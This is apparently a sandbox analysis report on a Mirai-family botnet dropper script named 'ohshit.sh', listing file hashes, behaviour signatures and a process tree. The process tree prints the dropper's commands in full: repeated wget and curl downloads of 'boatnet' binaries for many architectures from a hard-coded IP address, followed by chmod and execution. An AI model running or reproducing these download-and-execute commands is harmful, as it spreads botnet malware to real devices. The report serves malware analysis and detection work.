Analysis
-
max time kernel
59s -
max time network
65s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240729-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
31-08-2024 21:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
ohshit.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral7
Sample
ohshit.sh
Resource
ubuntu2004-amd64-20240729-en
Behavioral task
behavioral8
Sample
ohshit.sh
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
fefdf2b7ece4d55bd47778b420f84011
-
SHA1
2823096e0538910f9b57ff9bae007ec655520fc3
-
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
-
SHA512
b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Extracted
mirai
LZRD
Signatures
-
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/WTF 1440 WTF /tmp/WTF 1449 WTF /tmp/WTF 1458 WTF /tmp/WTF 1467 WTF /tmp/WTF 1476 WTF /tmp/WTF 1534 WTF /tmp/WTF 1562 WTF /tmp/WTF 1573 WTF /tmp/WTF 1582 WTF /tmp/WTF 1591 WTF /tmp/WTF 1602 WTF /tmp/WTF 1611 WTF /tmp/WTF 1620 WTF /tmp/WTF 1639 WTF -
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
resource yara_rule behavioral7/files/fstream-1.dat upx -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 1 TTPs 28 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/78/status WTF File opened for reading /proc/443/status WTF File opened for reading /proc/1548/status WTF File opened for reading /proc/1493/status WTF File opened for reading /proc/1319/status WTF File opened for reading /proc/536/status WTF File opened for reading /proc/995/status WTF File opened for reading /proc/1124/status WTF File opened for reading /proc/1570/status WTF File opened for reading /proc/163/status WTF File opened for reading /proc/1086/status WTF File opened for reading /proc/1514/status WTF File opened for reading /proc/1528/status WTF File opened for reading /proc/1605/status WTF File opened for reading /proc/1485/status WTF File opened for reading /proc/301/status WTF File opened for reading /proc/1522/status WTF File opened for reading /proc/22/status WTF File opened for reading /proc/76/status WTF File opened for reading /proc/1503/status WTF File opened for reading /proc/761/status WTF File opened for reading /proc/75/status WTF File opened for reading /proc/1123/status WTF File opened for reading /proc/12/status WTF File opened for reading /proc/1551/status WTF File opened for reading /proc/1074/status WTF File opened for reading /proc/22/status WTF File opened for reading /proc/16/status WTF File opened for reading /proc/1052/status WTF File opened for reading /proc/1454/status WTF File opened for reading /proc/800/status WTF File opened for reading /proc/1487/status WTF File opened for reading /proc/22/status WTF File opened for reading /proc/1074/status WTF File opened for reading /proc/1546/status WTF File opened for reading /proc/497/status WTF File opened for reading /proc/1082/status WTF File opened for reading /proc/71/status WTF File opened for reading /proc/89/status WTF File opened for reading /proc/1122/status WTF File opened for reading /proc/1454/status WTF File opened for reading /proc/1461/status WTF File opened for reading /proc/808/status WTF File opened for reading /proc/1570/status WTF File opened for reading /proc/2/status WTF File opened for reading /proc/1574/status WTF File opened for reading /proc/616/status WTF File opened for reading /proc/505/status WTF File opened for reading /proc/1548/status WTF File opened for reading /proc/636/status WTF File opened for reading /proc/761/status WTF File opened for reading /proc/827/status WTF File opened for reading /proc/1481/status WTF File opened for reading /proc/1088/status WTF File opened for reading /proc/175/status WTF File opened for reading /proc/176/status WTF File opened for reading /proc/1494/status WTF File opened for reading /proc/70/status WTF File opened for reading /proc/1435/status WTF File opened for reading /proc/480/status WTF File opened for reading /proc/1597/status WTF File opened for reading /proc/952/status WTF File opened for reading /proc/538/status WTF File opened for reading /proc/1508/status WTF -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.x86_64 wget File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.sh4 wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1396 -
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1397
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1402
-
-
/usr/bin/catcat boatnet.x862⤵PID:1438
-
-
/usr/bin/chmodchmod +x boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1439
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1440
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:1444
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:1446
-
-
/usr/bin/chmodchmod +x boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1448
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1449
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1453
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1455
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1457
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1458
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.i4682⤵PID:1462
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1464
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1466
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1467
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.i6862⤵PID:1471
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1473
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1475
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1476
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1480
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1531
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1533
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1534
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1538
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1540
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1561
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1562
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1566
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1569
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1572
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1573
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1577
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1579
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1581
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1582
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1586
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1588
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1590
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1591
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1595
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1597
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1601
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1602
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1606
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1608
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1610
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1611
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1615
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1617
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1619
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1620
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1624
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1633
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF2⤵PID:1638
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1639
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1643
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.sh42⤵PID:1648
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5ba2cb5b8715ba94c39e24e75a34d0ea0
SHA17182bf3b0e14e5224e741c15174c6e93f00df444
SHA25601fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA5120c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d